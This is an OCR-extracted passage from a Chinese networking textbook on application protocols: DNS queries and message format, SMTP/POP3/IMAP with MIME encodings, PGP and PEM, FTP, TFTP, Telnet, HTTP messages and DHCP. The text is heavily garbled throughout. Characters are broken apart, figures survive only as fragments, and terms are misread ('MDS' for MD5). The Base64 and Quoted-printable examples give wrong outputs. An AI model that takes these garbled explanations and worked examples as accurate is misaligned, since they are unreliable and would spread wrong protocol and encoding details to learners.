例子 中 主机 whu.edu.cn 要 查询 域名 为 dry.ssd.com ff IP 地址。 


本 地 域名 服务 器 
dns.edu.cn 根 域名 服务 器 


whu.edu.cn 


dry.ssd.com 


T dry.ssd.com 


给 出 dry.ssd.com 的 IP 


给 出 dry.ssd.com 的 IP 


© 
© 
给 出 dry.ssd.com 的 IP 

dry.ssd.com 


给 出 dry.ssd.com 的 IP 
© 


g 


dry.ssd.com 


顶级 域名 服务 器 
权限 域名 服务 器 dns.com 


dns.ssd.com 


图 3-23 ”本 地 域名 服务 器 的 递归 查询 


迭代 查询 的 思想 : 当 根 域名 服务 器 收 到 本 地 域名 服务 器 的 查询 请 求 时 ， 它 根据 查询 
请 求 告诉 本 地 域名 服务 器 下 一 步 应 该 去 查询 的 顶级 域名 服务 器 的 人 PP 地 址 ; 接着 本 地 域名 
服务 器 到 该 项 级 域名 服务 器 进行 查询 ， 若 顶级 域名 服务 器 能 够 给 出 查询 结果 ， 那 么 它 会 
把 结果 传送 给 本 地 域名 服务 器 ， 否 则 它 会 告诉 本 地 域名 服务 器 下 一 步 应 该 查询 的 权限 域 
名 服务 器 的 IP 地 址 ; 本 地 域名 服务 器 就 这 样 迭 代 进 行 查 询 , 直到 最 后 查 到 了 所 需要 的 IP 
地 址 ， 然 后 把 结果 反馈 给 发 起 查询 的 主机 。 图 3-24 给 出 了 一 个 迭代 查询 的 例子 。 同 样 还 
是 主机 whu.edu.cn 要 查询 域名 为 dry.ssd.com 的 IP 地 址 。 


Xt 
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五 


Boh «a 
l EEN 
rennet! 


D 
把 dry.ssd.com 的 IP 给 解析 器 | | dry.ssd.com 
a 


dry.ssd.com dry.ssd.com 


@ i z 
© 


(3 


给 出 dns.ssd.com 的 IP 给 出 dns.com 的 IP 


顶级 域名 服务 本 地 域名 服务 器 


给 出 dry.ssd.com 的 IP 


权限 域名 服务 器 


图 3-24 ”本 地 域名 服务 器 采用 和 迭代 查询 


另外 ， 在 域名 服务 器 中 常常 使 用 高 速 缓存 来 提高 DNS 的 查询 效率 。 主 机 和 每 个 域 
名 服务 器 都 维护 一 个 高 速 缓存 ， 存 放 最 近 查 询 过 的 域名 以 及 从 何 处 获得 域名 映射 信息 的 
记录 。 当 有 域名 解析 请 求 时 ， 首 先 在 自己 的 高 速 缓存 中 查找 ， 若 没有 才 向 其 他 域名 服务 
器 求助 。 为 了 维护 最 新 的 高 速 缓存 中 的 记录 ， 高 速 缓存 中 的 记录 隔 一 段 时 间 还 要 进行 清 


除 处 理 。 
(5) DNS 报 文 格式 


报 文 由 12 字 节 的 首部 和 4 个 长 度 可 变 的 字段 组 成 。 标 识字 段 由 客户 程序 设置 并 有 


服务 器 返回 结果 ， 如 图 3-25 所 示 。 
。 QR: 0 表示 查询 报 文 ，1 表示 响应 报 文 


e opcode: 通常 值 为 0 (标准 查询 )， 其 他 值 为 1 ( 反 向 查询 ) 和 2 服务 器 状态 请 求 ) 


。 AA: 表示 授权 回答 (authoritative answer) 
。 TC: 表示 可 截断 的 (truncated) 
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资源 记录 数 


授权 资源 记录 数 额外 资源 记录 数 


查询 问题 
回答 (资源 记录 数 可 变 ) 


授权 (资源 记录 数 可 变 ) 


额外 信息 (资源 记录 数 可 变 ) 


图 3-25 DNS 的 报 文 格式 


。 RD: 表示 期 望 递归 

。 RA: 表示 可 用 递归 

。 随后 3bit 必须 为 0 

e rcode: 返回 码 ， 通 常 为 0 (没有 差错 ) 和 3 (名 字 差 错 ) 

2. 电子 邮件 协议 

(1) 邮件 系统 功能 

电子 邮件 系统 的 主要 功能 包括 撰写 、 显 示 、 处 理 、 传 输 和 报告 五 项 基本 功能 。 其 中 
撰写 、 显 示 、 处 理 是 用 户 代 理 至 少 应 当 具 有 的 三 个 功能 ， 而 传输 和 报告 是 邮件 服务 器 应 
该 具备 的 功能 。 

。 撰写 : 给 用 户 提供 很 方便 地 编辑 信件 的 环境 。 

。 显示 : 能 方便 地 在 计算 机 屏幕 上 显示 出 来 信 〈 包 括 来 信 附 上 的 声音 和 网 像 )。 

。 处 理 : 处 理 包 括 发 送 邮件 和 接收 邮件 。 收 信人 应 能 根据 情况 按 不 同方 式 对 来 信 进 行 

处 理 。 例 如 ， 阅 读 后 删 除 、 存 盘 、 转 发 等 ， 对 于 不 愿 收 的 信件 可 直接 在 邮箱 中 删除 。 

。 传输 : 包括 发 送 和 接收 。 发 送 是 把 邮件 从 邮件 发 送 者 的 PC 机 中 发 送 到 本 地 邮件 
服务 器 ， 以 及 从 本 地 邮件 服务 器 传送 到 目的 邮件 服务 器 的 过 程 。 接 收 是 把 邮件 从 
目的 邮件 服务 器 传送 到 接收 邮件 用 户 的 PC 机 中 的 过 程 。 
报告 : 是 邮件 服务 器 向 发 信人 报告 邮件 传送 的 情况 。 如 已 发 送 成 功 、 发 送 失 败 等 。 


i 项 


EA 
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(2) 体系 结构 
邮件 系统 体系 结构 如 图 3-26 所 示 。 


邮件 服务 器 
f 消息 传输 代理 
D f 
理 
邮件 服务 器 
i 
9 k 消息 传输 代理 
D z 


K 3-26 ”邮件 系统 体系 结构 


体系 结构 中 包括 用 户 代 理 、 邮 件 服务 器 、 消 息 传输 代理 和 邮件 协议 。 

用 户 代 理 的 功能 前 面 已 经 讲 过 ， 邮 件 服务 器 的 功能 是 用 于 存储 邮件 ， 这 里 消息 传输 
代理 的 功能 就 是 实现 前 面 所 说 的 传输 和 报告 ， 邮 件 协 议 有 发 送 协 议 SMTP (Simple Mail 
Transfer Protocol)、 接 收 协议 POP3/IMAP4 (Post Office Protocol - Version 3/ Internet 
Message Access Protocol 4)。 关 于 邮件 协议 的 功能 在 下 面 内 容 叙 述 。 

G) 邮件 格式 

-个 电子 邮件 分 为 信封 、 首 部 和 主体 〈 正 文 )， 首 部 和 主体 也 称 为 内 容 部 分 。 首 部 
需要 用 户 填 写 , 首部 写 好 后 邮件 系统 将 自动 地 将 信封 所 需 的 信息 提取 出 来 并 写 在 信封 上 。 
所 以 用 户 不 需要 填写 电子 邮件 信封 上 的 信息 。 邮 件 的 主体 部 分 由 用 户 自由 撰写 。 

[RFC 822] 对 邮件 的 首部 格式 做 了 规定 〈 见 表 3-4)。 


表 3-4 [RFC 822] 邮 件 头 所 用 的 一 些 关键 词 


关 键 F 含 x 

TO: 第 一 收 信人 的 电子 邮件 地 址 

Ce: 第 二 收 信人 的 电子 邮件 地 址 
From: 撰写 邮件 的 个 人 或 多 个 名 字 
Sender: 实际 发 信人 的 电子 邮件 地 址 

Date: 发 送 邮件 的 日 期 和 时 间 

Reply-To: 回信 应 送 达 的 电子 邮件 地 址 
Subject: 在 一 行 中 显示 一 个 邮件 的 简短 摘要 
Keywords 户 选择 的 关键 词 

Bee: 盲 抄 送 的 电子 邮件 地 址 
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邮件 正文 : 最 简单 的 内 容 编 码 就 是 7 位 ASCH 码 (SMTP 只 能 传送 这 种 编码 )， 而 
且 每 行 不 能 超过 1000 个 字符 。 

用 户 在 撰写 邮件 时 一 般 都 是 使 用 自己 最 熟悉 的 语言 文字 ， 但 是 这 种 文本 不 能 被 
SMTP 传送 ， 而 且 二 进 制 文件 和 可 执行 文件 同样 也 不 能 被 SMTP 传送 。 

但 是 在 通用 Internet 邮件 扩充 MIME (Multipurpose Internet Mail Extensions) 中 定义 
了 传送 非 ASCI 码 的 编码 规则 .MIME 的 内 容 传送 编码 规则 有 Base64 和 Quoted-printable 
encoding。 

Base64: 适用 于 传送 任意 的 二 进 制 文件 。 有 具体 编码 规则 如 下 : 

第 一 步 ， 将 二 进 制 代码 划分 为 一 个 个 24bit 长 度 的 单元 。 

第 二 步 ， 将 每 一 个 24bit 单元 划分 为 4 个 6bit 组 。 每 一 个 6bit 组 按 以 下 方法 转换 成 
ASCI 码 。6bit 的 二 进 制 代 码 共有 64 种 不 同 的 值 (0 到 63). 

先 排 大 写字 母 : A 表 示 0，B 表示 1…… 

再 排 小 写字 母 : a 表示 26，b 表示 27…… 

再 排 10 个 数字 : 0 表示 52, 1 表示 53…… 

最 后 十 表示 62，/ 表 示 63。 

Bil: 有 二 进 制 代码 : 00110100 01000100 11001000 

Wi: 先 划分 为 4 个 Obit 分 组 : 


001101 000100 010011 001000 
对 应 的 Base64 编码 : N E T 8 
最 后 要 传送 的 ASCII: 01001110 01000101 01010100 00001000 


Quoted-printable 编码 : 适用 于 当 所 传送 的 数据 中 只 有 少量 的 非 ASCH fy. “=” 
和 不 可 打印 的 ASCII 码 以 及 非 ASCII 码 的 数据 的 编码 规则 为 : 先 将 每 个 字 节 的 二 进 制 代 
码 用 两 个 十 六 进 制 数字 表示 ， 然 后 在 前 面 加 上 一 个 “三 ” 简单 地 说 就 是 ASCII 码 大 于 
127 的 字符 替换 为 三 及 两 个 16 进 制 数 。“=” 的 Quoted-printable 编码 为 “3D”。 
例如 ; 武汉 的 二 进 制 编码 为 ，11001110 11100100 10111010 10110101 
对 应 的 十 六 进 制 编码 : CE E4 BA BA 
Quoted-printable 编码 : 3DCE 3DE4 3DBA 3DBA 
(4) 邮件 发 送 与 接收 协议 
SMTP 发 送 协议 : SMTP 的 工作 方式 也 是 客户 服务 器 的 方式 。 负 责 发 送 邮 件 的 SMTP 
进程 就 是 SMTP 客户 ， 负 责 接收 邮件 的 SMTP 进程 是 SMTP 服务 器 。 它 在 传输 层 使 用 
TCP 协议 进行 传输 。 
SMTP ea SMTP 进程 之 间 应 如 何 交换 信息 。 
它 规定 了 14 条 命令 和 三 类 应 答 信息 。 每 条 命令 用 4 个 字母 组 成 。 
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D SMTP 命令 集 。 

HELO 发 送 身份 标识 

MAIL 识别 邮件 发 起 方 

RCPT 识别 邮件 接收 方 

DATA 传送 报 文 文本 

RSET 放弃 当前 邮件 事物 

NOOP 无 操作 

QUIT 关闭 TCP 连接 

SEND 向 终端 发 送 邮件 

SOML 若 可 能 向 终端 发 送 邮件 ， 否 则 发 往 信箱 

SAML 向 终端 和 信箱 发 送 邮件 

VRFY 证 实用 户 名 

EXPN 返回 邮件 发 送 清单 的 成 员 

HELP 发 送 帮助 文档 

TURN 颠倒 发 送 方 和 接收 方 的 角色 

@ SMTP 应 答 码 包括 肯定 、 暂 时 否定、 永久 否定 三 大 类 。 
@ 建立 连接 。 

第 一 步 : 使 用 SMTP 的 熟知 端口 号 码 (25) 与 目的 主机 的 SMTP 服务 器 建立 TCP 连接 


〈 不 使 用 中 间 服 务 器 ) 


第 二 步 : 接收 程序 通过 应 答 220 标识 自己 就 绪 
第 三 步 : 发 送 程序 发 送 HELO 标识 自己 
第 四 步 : SMTP 服务 器 若 有 能 力 接收 邮件 , 则 回答 :“250 0K”, 表示 已 准备 好 接收 。 


车 SMTP 服务 器 不 可 用 ， 则 回答 “421 Service not available 〈 服 务 不 可 用 )”。 


@ 传送 。 

第 一 步 : 用 一 个 MAIL 命令 标识 报 文 发 起 方 

第 二 步 : 用 一 个 或 多 个 RCPT 命令 标识 报 文 的 接收 方 

第 三 步 : 用 一 个 DATA 命令 传送 报 文 文本 

© 释放 连接 。 

第 一 步 : 发 送 一 个 QUIT 命令 ， 并 等 待 应 答 

第 二 步 : 关闭 TCP 连接 

接收 协议 : 

© POP3 

POP3 也 使 用 客户 服务 器 的 工作 方式 。 在 接收 邮件 的 用 户 PC 机 中 必须 运行 POP 客 
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户 程序 ， 而 在 用 户 所 连接 的 ISP 的 邮件 服务 器 中 则 运行 POP3 服务 器 程序 。POP3 服务 器 
具有 身份 鉴别 功能 ， 用 户 只 有 输入 鉴别 信息 后 才 允 许 对 邮箱 进行 读 取 ， 另 外 它 还 具有 从 
服务 器 读 取 邮 件 并 存放 到 本 地 机 器 上 以 及 对 邮件 删除 、 备 份 等 其 他 操作 功能 。 

POP3 也 使 用 TCP 协议 ， 对 邮件 进行 传输 。 

POP3 协议 的 一 个 特点 就 是 只 要 用 户 从 POP 服务 器 读 取 了 邮件 ，POP 服务 器 就 将 该 
邮件 删除 了 。 

@ IMAP 

IMAP 是 一 个 联机 协议 。 当 用 户 PC 机 上 的 IMAP 客户 程序 打开 IMAP 服务 器 的 
邮箱 时 ， 用 户 就 可 看 到 邮件 的 首部 。 用 户 打开 某 个 邮件 时 ， 那 个 邮件 才 传 到 用 户 的 计算 
机 上 。 所 以 用 户 可 以 在 不 同 的 地 方 使 用 不 同 的 计算 机 反复 阅读 自己 的 邮件 ， 直 到 用 户 发 
出 删除 邮件 的 命令 ，IMAP 服务 器 邮箱 中 的 邮件 会 一 直 保 存 着 。 

(5) 邮件 保密 

电子 邮件 中 有 时 会 有 一 些 非常 隐私 的 东西 ， 但 电子 邮件 在 传输 过 程 中 除了 必须 到 达 
的 邮件 服务 器 外 ， 还 经 常 需要 多 个 路 由 器 进行 转发 ， 所 以 邮件 的 保密 问题 就 成 为 一 个 值 
得 考虑 的 问题 。 

@ PGP (Pretty Good Privacy) 协议 。 

PGP 协议 虽然 不 是 Intemet 的 正式 标准 ， 但 已 被 广泛 使 用 。PGP 的 功能 包括 加 密 、 
鉴别 、 电 子 签名 和 压缩 等 技术 。 这 些 功 能 保证 了 电子 邮件 的 安全 性 、 报 文 完整 性 和 发 送 
方 鉴别 。 下 面 通过 一 个 例子 来 具体 说 明 PGP 的 工作 过 程 。 

假定 张 三 要 向 李 四 发 送 安 全 电子 邮件 , 使 用 PGP 协议 来 保证 其 安全 性 。 发 送 方 张 三 
应 该 有 三 个 密 钥 : 自己 的 私 铀 KDA， 李 四 的 公 钥 KEB， 自 己 生成 的 一 次 性 密 钥 K。 接 
收 方 李 四 需 要 两 把 密 钥 : 自己 的 私 钥 KDB 和 张 三 的 公 钥 KEA。 具 体 工 作 过 程 如 下 : 

发 送 方 张 三 的 工作 : 

第 一 步 ， 使 用 MDS 对 所 发 邮件 的 明文 M 进行 摘要 运算 ， 结 果 为 H(M)。 

第 二 步 ， 张 三 使 用 自己 的 私 钥 KDA 对 摘要 HIM 进 行 数字 签名 ， 结 果 为 E(H (M), 
KDA)。 

B=, LEC (M), KDA) 和 明文 M 拼接 在 一 起 ， 结 果 为 EIH M), KDA)+ 


M. 
第 四 步 ， 张 三 使 用 自己 生成 的 一 次 性 密 钥 KK 对 E(H M), KDA) 十 M 进行 加 密 , E 
(E(H (M), KDA)+M, K). 
第 五 步 ， 使 用 李 四 的 公 钥 对 张 三 的 一 次 性 私 钥 进行 加 密 ， 结 果 为 下 CK, KEB). 
第 六 步 ， 对 E ŒH M), KDA)+M, K) 进行 压缩 ， 然 后 和 EE (K, KEB) 一 起 
发 送 给 李 四 。 
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接收 方 李 四 的 工作 : 

第 一 步 ， 接 收 后 ， 把 压缩 文件 和 E (K, KEB) 进行 分 开 ， 并 对 压缩 文件 进行 解 

第 二 步 ， 李 四 用 自己 的 私 钥 对 E CK, KEB) 进行 解密 ，D(E (K, KEB), KDB)=K. 

Ho, 李 四 用 密 钥 K 对 E(E(H (M)，KDA)+M, K) 进行 解密 , D CE (E(H M), 
KDA)+M, K)) =E(H (M), KDA)+M 。 

第 四 步 ， 把 EIH (M), KDA)+M 分开 为 EH (M), KDA) 和 M。 

第 五 步 ， 用 张 三 的 公 钥 对 EGHE M), KDA) 核 实 签名 ， 得 到 结果 H M). 

第 六 步 ， 李 四 对 明文 M 进行 MDS 的 摘要 运算 ， 得 到 结果 h CM). 

第 七 步 ， 比 较 H CM) 和 h M) 是 否 相 等 。 如 果 相 等 证 明 电子 邮件 是 张 三 发 的 。 
而 且 报 文 M 没有 被 自 改 ， 即 报 文 的 完整 性 得 到 检验 。 

@ PEM (Privacy Enhanced Mail ) 协议 。 

PEM 是 因特网 的 邮件 加 密 建 议 标准 ， 由 四 个 RFC 文档 来 描述 : 

RFC 1421: 报 文 加 密 与 鉴别 过 程 。 

RFC 1422: 基于 证 书 的 密 钥 管理 。 

RFC 1423: PEM 的 算法 、 工 作 方 式 和 标识 符 。 

RFC 1424: 密 钥 证 书 和 相关 的 服务 。 

PEM 的 功能 和 PGP 的 差不多 , 都 是 对 基于 [RFC 822] 的 电子 邮件 进行 加 密 和 鉴别 。 
每 个 报 文 都 是 使 用 一 次 一 密 的 方法 进行 加 密 ， 并 且 密 钥 也 是 放 在 报 文 中 一 起 在 网 络 上 传 
送 。 对 密 钥 还 必须 加 密 ， 可 以 使 用 RSA 或 三 重 DES。PEM 有 比 PGP 更 完善 的 密 钥 管 
理 机 制 。 由 证 书 管理 机 构 (Certificate Authority，CA) 发 布 证 书 。 

3. 文件 传输 协议 FTP (File Transfer Protocol) 

(1) FTP 概述 

FTP 的 功能 是 实现 在 客户 机 〈 本 地 机 ) 和 FTP 服务 器 (远程 计算 机 ) 之 间 文 件 的 传 
送 ， 通 常 把 文件 从 FTP 服务 器 上 找到 本 地 计算 机 ， 称 为 下 载 ; 把 本 地 计算 机 的 文件 送 到 
FTP 服务 器 上 ， 称 为 上 载 。 

FTP 的 工作 过 程 : FTP 是 一 个 交互 会 话 的 系统 ， 在 进行 文件 传输 时 ，FTP 的 客户 和 
服务 器 之 间 需 要 建立 两 个 TCP 连接 ， 一 个 控制 连接 ， 一 个 数据 连接 。 如 图 3-27 所 示 。 

FTP 服务 器 在 接收 到 FTP 客户 进程 发 来 的 服务 请 求 后 , 创建 从 属 进 程 和 该 客户 进程 
建立 控制 连接 。 控 制 连接 在 整个 会 话 期 间 一 直 打 开 着 ，FTP 客户 端 发 出 的 传送 请 求 通过 
控制 连接 发 送 给 服务 器 ， 但 控制 连接 不 用 来 传送 文件 ， 用 于 传输 文件 的 是 数据 连接 。 服 
务 器 端的 控制 进程 在 接收 到 客户 端 发 送 来 的 文件 传输 请 求 后 创建 数据 传送 进程 ， 从 而 和 
客户 端的 数据 传送 进程 建立 数据 连接 。 完 成 文件 的 传送 后 ， 关 闭 数据 传送 连接 并 结束 运 
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行 。 但 控制 连接 并 不 一 定 关闭 。 


客户 客户 服务 器 
控制 连接 控制 连接 控制 连接 


图 3-27 FTP 的 两 个 TCP 连接 


服务 器 
控制 连接 


FTP 使 用 客户 /服务 器 方式 ， 在 传输 层 使 用 TCP 可 靠 的 服务 。 一 个 FTP 服务 器 进 
程 可 同时 为 多 个 客户 进程 提供 服务 。FTP 的 服务 器 进程 由 两 大 部 分 组 成 : 一 个 主 进程 ， 


负责 接受 新 的 请 求 ， 另 外 有 若干 个 从 属 进程 ， 负 责 处 理 单个 请 求 。 
© 主 进程 的 工作 步骤 〈 接 收 请 求 ): 
。 打开 端口 21; 
。 监听 客户 的 请 求 ; 


。 收 到 请 求 后 启动 一 个 从 属 进程 处 理 客户 的 请 求 ， 从 属 进程 完成 后 自动 终止 ; 


。 回 到 监听 状态 。 

© 从 属 进程 的 工作 步骤 ; 

。 接收 主 进程 的 命令 ， 创 建 控制 进程 ; 
。 建立 与 客户 的 控制 连接 ; 


。 收 到 客户 从 控制 连接 发 来 的 传送 请 求 后 ， 创 建 数据 传送 进程 ; 


。 与 客户 建立 数据 连接 (端口 20)， 并 与 数据 传送 进程 关联 ; 
。 数据 传送 进程 控制 数据 连接 及 文件 传送 ; 

。 传送 完毕 ， 释 放 数 据 连接 ， 终 止 数据 进程 ; 

。 释放 控制 连接 ， 终 止 控制 进程 (一 般 由 客户 发 起 )。 

主 进程 与 从 属 进程 的 处 理 是 并 发 地 进行 。 


FIP 支持 两 种 模式 ， 一 种 方式 叫做 Standard (也 就 是 PORT 方式 ， 主 动 方式 )， 一 种 


是 Passive (也 就 是 PASV， 被 动 方式 )。 


。 Standard 模式 是 FTP 的 客户 端 发 送 PORT 命令 到 FTP 服务 器 。FTP 的 客户 端 首 


Boo: 加 
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FCA ETP 服务 器 的 TCP 21 端口 建立 连接 ， 通 过 这 个 通道 发 送 命令 ， 客 户 端 需要 
接收 数据 的 时 候 在 这 个 连接 上 发 送 PORT 命令 ， 其 中 包含 了 客户 端 用 于 接收 数据 
的 端口 。 服 务 器 端 通过 自己 的 TCP 20 端口 连接 至 客户 端的 指定 端口 建立 数据 连 
Passive 模式 是 FTP 的 客户 端 发 送 PASV 命令 到 FTP 服务 器 。 在 建立 控制 连接 时 
和 Standard 模式 类 似 ， 但 建立 连接 后 发 送 的 不 是 PORT 命令 ， 而 是 PASV 命令 。 
FTP 服务 器 收 到 PASV 命令 后 ， 随 机 打开 一 个 高 端 端口 〈 端 口号 大 于 1024)， 并 
且 通 知客 户 端 在 这 个 端口 上 传送 数据 ， 客 户 端 连接 FTP 服务 器 此 端口 〈 非 20 端 
口 ) 建立 数据 连接 进行 数据 传送 。 

(2) TFTP (Trivial File Transfer Protocol) 

TFTP 是 Trivial FTP 的 缩写 , 常 被 称 为 简单 文件 传送 协议 。 它 采用 客户 /服务 器 方式 ， 
传输 层 使 用 UDP 数据 报 ， 因 此 TFTP 需要 有 自己 的 差错 改正 措施 。 

TFTP 只 支持 文件 传输 而 不 支持 交互 。TFTP 没有 一 个 庞大 的 命令 集 ， 没 有 列 目录 
的 功能 ， 也 不 能 对 用 户 进行 身份 鉴别 。 

TETP 的 主要 特点 : 因为 工作 在 停止 等 待 方式 ， 每 个 报 文 需要 应 答 ; 使 用 UDP 报 文 
每 次 固定 传送 512 字 节 的 用 户 数 据 ， 可 对 文件 进行 读 或 写 。 

4. 远程 登录 协议 Telnet 

Telnet 的 目的 是 提供 一 个 相对 通用 的 、 双 向 的 通信 机 制 ， 使 得 用 户 能 够 登录 进入 
远程 主机 系统 ， 把 自己 仿真 成 远程 主机 的 终端 。 因 此 ，Telnet 有 时 也 被 称 为 虚拟 终端 
协议 。 

(1) 基本 服务 : 

© Telnet 定义 一 个 网 络 虚拟 终端 为 远 地 系 统 提 供 一 个 标准 接口 。 客 户 机 程序 不 必 详 
细 了 解 远 地 系统 ， 只 需 构造 使 用 标准 接口 的 程序 。 

@ Telnet 包括 一 个 允许 客户 机 和 服务 器 协商 选项 的 机 制 ， 而 且 它 还 提供 一 组 标准 


@ Telnet 对 称 处 理 连接 的 两 端 ， 一 旦 创建 了 Telnet 会 话 ， 每 台 计 算 机 都 可 同等 地 相 
互 发 送 和 接收 数据 。 

(2) 工作 过 程 

Telnet 远程 登录 服务 分 为 以 下 4 个 过 程 : 

O 本 地 与 远程 主机 建立 连接 。 该 过 程 实 际 上 是 建立 一 个 TCP 连接。 

@ 截获 本 地 计算 机 上 输入 的 任何 命令 或 字符 ， 以 NVT (Network Virtual Terminal ) 
格式 传送 到 远程 主机 。 该 过 程 实际 上 是 从 本 地 主机 向 远程 主机 发 送 一 个 卫 数据 报 。 

@ 将 远程 主机 输出 的 NVT 格式 的 数据 转化 为 本 地 所 接受 的 格式 送 回 本 地 终端 , 包 
括 输入 命令 回 显 和 命令 执行 结果 。 

@ 最 后 ， 本 地 终端 对 远程 主机 进行 撤消 连接 。 该 过 程 是 撤销 一 个 TCP 连接 。 
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5. Web 应 用 与 HTTP (Hyper Text Transfer Protocol) 协议 

C1) Web 资源 组 织 方式 与 URL 

WWW (World Wide Web) 称 为 万 维 网 ， 有 了 时 简写 为 Web。 严 格 地 说 ，WWW 并 不 

一 种 网 络 ， 而 是 一 种 信息 组 织 方 式 。 

WWW 是 一 种 分 布 式 的 超 媒 体系 统 。WWW 基于 浏览 器 /服务 器 模式 (B/S), 它 改 进 

了 传统 的 客户 /服务 器 计算 模型 ， 将 原来 客户 端 一 侧 的 应 用 程序 模块 与 用 户 界面 分 开 ， 

将 应 用 程序 模块 放 到 服务 器 上 ， 这 样 应 用 程序 可 独立 于 客户 端 平 台 ， 使 系统 具有 用 户 界 
面 简单 ， 可 在 地 理 与 系统 间 移 动 ， 应 用 程序 可 移植 和 可 伸缩 等 优点 。WWW 多 媒体 信息 
服务 系统 由 Web 服务 器 、 浏 览 器 (Browser) 和 通信 协议 等 三 部 分 组 成 。 其 中 通信 协议 
采用 的 是 超 文本 传输 协议 HTTP. 

(2) HTTP 协议 工作 原理 

为 了 使 超 文本 的 链接 能 够 高 效率 地 完成 , 需要 用 HTTP 协议 来 传送 一 切 必 需 的 信息 。 
从 层次 的 角度 看 ，HTTP 是 面向 事务 的 Ctransaction-oriented) 应 用 层 协 议 ， 它 使 用 TCP 
连接 进行 可 靠 的 传送 。HTTP 是 一 个 无 状态 的 协议 ， 即 服务 器 向 客户 机 发 送 被 请 求 的 文 
件 时 ， 并 不 存储 任何 关于 该 客户 机 的 状态 信息 。HTTP 协议 定义 了 Web 客户 机 是 如 何 向 
Web 站 点 请 求 Web 页 ， 以 及 服务 器 如 何 将 Web 页 传送 给 客户 机 的 。 

HTTP 报 文 结构 


O 请 求 报 文 格式 ， 如 图 3-28 所 示 。 
方法 空格 | URL | 空格 | 版 本 请 求 行 
首部 字段 名 |: | 空格 值 
i HRT 
首部 字段 名 空格 值 
空 一 行 
实体 主体 实体 主体 部 分 


3-28 HTTP 请求 报 文 格式 


请 求 报 文 
请 求 方式 请 求 首部 字段 
OPTIONS | MOVE Accept | IEModified-Since 

GET | DELETE Accept-Charset | Proxy-Authorization 
HEAD Accept-Encoding Range 

POST | Referer 

PUT Unless 
PATCH WRAPPED [i User-Agent 


COPY extension-method 


Bo: 8 
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@ 响应 报 文 格式 ， 如 图 3-29 所 示 。 


版 本 空格 状态 码 ”| 空格 | 短语 状态 行 
首部 字段 名 空格 值 
首部 行 
首部 字段 名 空格 值 
空 一 行 
实体 主体 实体 主体 部 分 
图 3-29 HTTP 响应 报 文 格式 
响应 报 文 
响应 状态 码 响应 首部 字段 
Continue MovedTemporarily RequestTimeonut Location 
SwitchingProtocols SeeOther Conflict Proxy-Authenticate 
OK NotModified Gone Public 
Created UseProxy LengthRequired Retry-After 
Accepted BadRequest UnlessTrue Server 
Non-Authoritative Unauthorized InternalServerError WWW-Authenticate 
Information PaymentRequired NotIimplemented 
NoContent Forbidden BadGateway 
ResetContent NotFound ServiceUnavailable 
PartialContent MethodNotAllowed GatewayTimeout 
MultipleChoice NoneAcceptable Extensioncode 
MovedPermanently Proxy Amthentication 
Required 


状态 码 都 是 三 位 数字 ， 意 义 如 下 : 
。 1xx 表示 通知 信息 的 ， 如 请 求 收 到 了 或 正在 进行 处 理 。 
。 2xx 表示 成 功 ， 如 接收 或 知道 了 。 


。 3xx 表示 重 定 向 ， 表 示 要 完成 请 求 还 必须 采取 进一步 的 行动 。 


。 Axx 表示 客户 的 差错 ， 如 请 求 中 有 错误 的 语法 或 不 能 完成 。 
。 5xx 表示 服务 器 的 差错 ， 如 服务 器 失效 无 法 完成 请 求 。 


a 


.动态 主机 配置 协议 DHCP (DynamicHostConfigurationProtocol) 
(1) DHCP 的 功 全 
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在 大 型 网 络 中 ,为 每 台 设 备 分 配 IP 地 址 是 件 麻烦 的 事情 。 另 外 ， 可 能 没有 足够 多 的 


IP 地 址 为 每 台 设备 固定 一 个 卫 地 址 ， 按 需 申请 、 
够 的 问题 。DHCP 是 一 种 集中 管理 和 自动 分 配 IP 
中 心 节点 监控 和 分 配 IP 地 址 。 当 
TP iht. 

DHCP 使 用 一 个 IP 地 址 池 记 录 所 管理 的 IP 
配给 特定 设备 ， 用 完 后 回收 ， 然 后 加 进 地 址 池 。 


用 完 归 还 的 方法 ， 可 以 缓解 瑟 地 址 不 
地 址 的 协议 。DHCP 使 网 络 管理 员 能 从 


台 计 算 机 移 到 网 络 中 的 其 他 位 置 时 ， 能 自动 收 到 新 的 


地 址 ， 分 配 时 从 地 址 池 中 取 一 个 地 址 分 


DHCP 使 用 了 租约 的 概念 ， 表示 TP 地 址 的 有 效 期 。 租 用 时 间 是 不 定 的 ， 主 要 取决 于 


用 户 在 某 地 连接 Internet 的 时 间 。 


DHCP 支持 三 种 类 型 的 他 地址 分 配方 式 : 第 一 种 人 工分 配 ， 也 称 静 态 分 配 ，DHCP 
为 设备 分 配 一 个 固定 的 IP 地 址 ， 第 二 种 动态 分 配 ，DHCP 从 地 址 池 中 分 配 一 个 IP 地 址 


给 申请 者 ， 该 地 址 有 时 间 限 制 ， 在 租约 结束 后 收 
选择 一 个 地 址 ， 自 动 地 将 其 永久 地 分 配给 一 台 设 
每 台 设备 又 需要 有 固定 地 址 的 情况 。 

(2) DHCP 报 文 格式 

DHCP 的 报 文 格式 如 表 3-5. 


回 ; 第 三 种 自动 分 配 ， 从 可 用 地 址 池 中 
备 。 这 种 方式 适合 有 足够 多 的 IP 地 址 ， 


# 3-5 DHCP 报 文 格式 
1 字 节 1 字 节 1 字 节 1 字 节 
操作 人 码 
事物 标识 符 
秒 数 标志 
客户 机 下 地 址 
“你 的 ”下 地址 
服务 器 IP 地 址 
网 管 下 地 址 
客户 机 硬件 地 址 (16 字 节 ) 
服务 器 名 (64 FW) 
引导 文件 名 (128 字 节 ) 
选项 (可 变 长 度 ) 
(3) DHCP 消息 类 型 
DHCP 的 消息 类 型 如 表 3-6。 
表 3-6 DHCP 消息 类 型 
HO å a 功 能 
DHCPDISCOVER 客户 进行 广播 以 确定 本 地 可 用 的 服务 器 
DHCPOFFER 服务 器 给 客户 的 应 答 ， 在 其 中 包括 了 配置 参数 


Hop 


Pa 
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客户 发 送 给 服务 器 : 客户 从 一 台 服务 器 上 请 求 配置 信息 ， 在 系统 
DHCPREQUEST 重新 启动 后 ， 客 户 利用 这 个 消息 确认 原来 分 配 的 网 络 地 址 仍然 有 

效 ; 客户 要 求 对 特定 的 网 络 地 址 租用 时 间 要 求 延期 
DHCPACK 服务 器 发 向 用 户 的 消息 ， 包 括 了 配置 参数 和 网 络 地 址 

BRE jnl JWE, $ 当前 使 名 Ah al 

DECPUNK TE EEA 知客 户 当前 使 用 的 网 络 地 址 无 效 或 租 
DHCPDECLINE 客户 发 向 服务 器 的 消息 ， 告 知 服务 器 此 地 址 已 被 使 用 
DHCPRELEASE 客户 发 向 服务 器 的 消息 ， 告 知 服务 器 此 地 址 不 再 使 用 
